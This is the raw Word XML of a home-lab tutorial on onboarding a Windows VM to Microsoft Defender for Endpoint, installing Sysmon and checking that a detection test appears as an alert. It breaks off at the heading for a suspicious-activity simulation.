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22322" w14:textId="77777777" w:rsidR="005B0468" w:rsidRPr="005B0468" w:rsidRDefault="005B0468" w:rsidP="005B0468">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="005B0468">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0468">
        <w:t xml:space="preserve"> Goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600A90FD" w14:textId="77777777" w:rsidR="005B0468" w:rsidRDefault="005B0468" w:rsidP="005B0468">
      <w:r w:rsidRPr="005B0468">
        <w:t>Simulate a real-world SOC scenario: onboard a Windows VM to Defender for Endpoint, generate telemetry through benign and suspicious activity, and validate detection and hunting capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C8EF7A" w14:textId="6D20C520" w:rsidR="005B0468" w:rsidRPr="005B0468" w:rsidRDefault="005B0468" w:rsidP="005B0468">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="005B0468">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0468">
        <w:t xml:space="preserve"> Lab Setup Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494EA437" w14:textId="12263553" w:rsidR="002D699D" w:rsidRDefault="005B0468">
      <w:r w:rsidRPr="005B0468">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ED85EA2" wp14:editId="2DB35082">
            <wp:extent cx="4724809" cy="1539373"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="136917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1718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9B7B" w14:textId="77777777" w:rsidR="005B0468" w:rsidRPr="005B0468" w:rsidRDefault="005B0468" w:rsidP="005B0468">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="005B0468">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0468">
        <w:t xml:space="preserve"> Step-by-Step Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11016D31" w14:textId="77777777" w:rsidR="005B0468" w:rsidRPr="005B0468" w:rsidRDefault="005B0468" w:rsidP="00C81BE4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="005B0468">
        <w:t>1️</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0468">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0468">
        <w:t xml:space="preserve"> Prepare Your Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC6AA6B" w14:textId="77777777" w:rsidR="005B0468" w:rsidRPr="005B0468" w:rsidRDefault="005B0468" w:rsidP="005B0468">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B0468">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="005B0468">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows 10/11 Pro or Enterprise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2684BEDD" w14:textId="77777777" w:rsidR="005B0468" w:rsidRPr="005B0468" w:rsidRDefault="005B0468" w:rsidP="005B0468">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B0468">
        <w:t>Ensure internet access and latest updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9ADEA7" w14:textId="77777777" w:rsidR="005B0468" w:rsidRDefault="005B0468" w:rsidP="005B0468">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B0468">
        <w:t xml:space="preserve">Install </w:t>
      </w:r>
      <w:r w:rsidRPr="005B0468">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sysmon</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0468">
        <w:t xml:space="preserve"> with a community config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F069C5F" w14:textId="2BBD456E" w:rsidR="00C81BE4" w:rsidRDefault="00C81BE4" w:rsidP="00C81BE4">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C81BE4">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>sysmon -accepteula -i sysmonconfig.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BAF14E" w14:textId="77777777" w:rsidR="00BE75EE" w:rsidRDefault="00BE75EE" w:rsidP="00C81BE4">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5095E8E5" w14:textId="2C55B495" w:rsidR="00BE75EE" w:rsidRPr="005B0468" w:rsidRDefault="00BE75EE" w:rsidP="00C81BE4">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE75EE">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EFD88C0" wp14:editId="0F7418AD">
            <wp:extent cx="5014395" cy="4701947"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="71859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4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2BDB" w14:textId="77777777" w:rsidR="00C81BE4" w:rsidRDefault="00C81BE4" w:rsidP="00C81BE4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00C81BE4">
        <w:t>2️</w:t>
      </w:r>
      <w:r w:rsidRPr="00C81BE4">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00C81BE4">
        <w:t xml:space="preserve"> Onboard to Defender for Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772CFE64" w14:textId="6122FC15" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:t xml:space="preserve"> Step 1: Go to the Right Portal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F247A1" w14:textId="3EF96CF8" w:rsidR="00C81BE4" w:rsidRDefault="00C81BE4" w:rsidP="00C81BE4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C81BE4">
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="007C0C23" w:rsidRPr="00C81BE4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://security.microsoft.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5847BA40" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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  <w:r w:rsidRPr="007C0C2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This is now called </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>Microsoft Defender XDR</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23"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  <w:t xml:space="preserve"> (formerly Microsoft 365 Defender)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A2F3F8" w14:textId="074AD9FE" w:rsidR="00D62597" w:rsidRPr="007C0C23" w:rsidRDefault="00D62597" w:rsidP="00D62597">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D97E9F4" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:t xml:space="preserve"> Step 2: Navigate to Device Onboarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F6DD48" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:t xml:space="preserve">In the left-hand menu, click </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:t xml:space="preserve"> (gear icon at bottom left)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7493CA00" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:t xml:space="preserve">Under </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:t xml:space="preserve">, choose </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B960B4" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:t xml:space="preserve">Then select </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Device Onboarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BFB93A" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:t>You’ll now see onboarding options for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7431A5C2" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Windows 10/11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB0EC74" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316BE40D" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>macOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13188C42" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC98908" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="00527D78" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mobile (Android/iOS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D6204A" w14:textId="143814DE" w:rsidR="00527D78" w:rsidRDefault="00527D78" w:rsidP="00527D78">
      <w:r w:rsidRPr="00527D78">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46853F1F" wp14:editId="4E4E5F1A">
            <wp:extent cx="5943600" cy="3167380"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="168340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02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CFDA" w14:textId="27D42438" w:rsidR="00527D78" w:rsidRPr="007C0C23" w:rsidRDefault="00527D78" w:rsidP="00527D78">
      <w:r w:rsidRPr="00527D78">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="107E3D0E" wp14:editId="70F4DAE6">
            <wp:extent cx="5943600" cy="3633470"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="52749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99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D591" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📦</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:t xml:space="preserve"> Step 3: Choose Your Platform &amp; Onboarding Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFFF777" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:t xml:space="preserve">For your </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows VM</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C55742" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:t xml:space="preserve">Select </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows 10/11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB186AC" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:t xml:space="preserve">Choose </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local Script</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:t xml:space="preserve"> (ideal for home lab)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B884C86" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:t>Download the onboarding package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EC9AED" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:t>Run the script inside your VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0065D1" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ubuntu VM</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104ED619" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:t xml:space="preserve">Select </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B784863" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:t>Follow the instructions to install the MDE Linux agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107DC680" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:t>Run the onboarding script via terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE4F006" w14:textId="47B7C664" w:rsidR="00527D78" w:rsidRDefault="00527D78" w:rsidP="00527D78">
      <w:r w:rsidRPr="00527D78">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7042C60A" wp14:editId="28BDFDAE">
            <wp:extent cx="5943600" cy="3818255"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="537030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30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FEB" w14:textId="77777777" w:rsidR="00527D78" w:rsidRDefault="00527D78" w:rsidP="00527D78"/>
    <w:p w14:paraId="0FD14A7C" w14:textId="1207A05E" w:rsidR="00527D78" w:rsidRDefault="00527D78" w:rsidP="00527D78">
      <w:r w:rsidRPr="00527D78">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="499FF0AB" wp14:editId="76454F68">
            <wp:extent cx="5943600" cy="3685540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5060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96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A032" w14:textId="1FAF6F0F" w:rsidR="00527D78" w:rsidRDefault="00527D78" w:rsidP="00527D78">
      <w:r w:rsidRPr="00527D78">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2844457A" wp14:editId="499B2BFA">
            <wp:extent cx="5943600" cy="3175635"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="706239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239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E6178" w14:textId="7FE924DA" w:rsidR="00527D78" w:rsidRDefault="00527D78" w:rsidP="00527D78">
      <w:r w:rsidRPr="00527D78">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E37B236" wp14:editId="552DE645">
            <wp:extent cx="5943600" cy="2849245"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="141962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290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2CBE" w14:textId="32D357B3" w:rsidR="00A35004" w:rsidRPr="007C0C23" w:rsidRDefault="00A35004" w:rsidP="00527D78">
      <w:r w:rsidRPr="00A35004">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70D82DCA" wp14:editId="30618E54">
            <wp:extent cx="4625741" cy="2758679"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="154530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03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D693" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🧪 Step 4: Validate Onboarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033D8505" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Devices &gt; Device Inventory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A24CC75" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:t>Your VM should appear within 30–60 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C494D3" w14:textId="77777777" w:rsidR="007C0C23" w:rsidRPr="007C0C23" w:rsidRDefault="007C0C23" w:rsidP="007C0C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C23">
        <w:t xml:space="preserve">You can now simulate activity and use </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advanced Hunting</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C23">
        <w:t xml:space="preserve"> to query telemetry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17070C4C" w14:textId="7FEDD1F7" w:rsidR="007C0C23" w:rsidRDefault="0017663F" w:rsidP="007C0C23">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0017663F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="619CDECC" wp14:editId="03FE1E6E">
            <wp:extent cx="5943600" cy="3028950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13819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264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743E" w14:textId="4CECC7B8" w:rsidR="00A35004" w:rsidRDefault="00A35004" w:rsidP="007C0C23">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>The detection test I ran showed up under incidents and alerts tab as seen in the screen shot below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACECC1E" w14:textId="5517B659" w:rsidR="00A35004" w:rsidRPr="00C81BE4" w:rsidRDefault="00A35004" w:rsidP="007C0C23">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00A35004">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09BB481B" wp14:editId="52B87851">
            <wp:extent cx="5943600" cy="3030220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="99397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7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29B3" w14:textId="77777777" w:rsidR="00C81BE4" w:rsidRDefault="00C81BE4" w:rsidP="00C81BE4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00C81BE4">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>3️</w:t>
      </w:r>
      <w:r w:rsidRPr="00C81BE4">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00C81BE4">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t xml:space="preserve"> Simulate Suspicious Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CCA636" w14:textId="77777777" w:rsidR="00C81BE4" w:rsidRDefault="00C81BE4" w:rsidP="00C81BE4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PowerShell Enumeration</w:t>
      </w:r>
    </w:p>
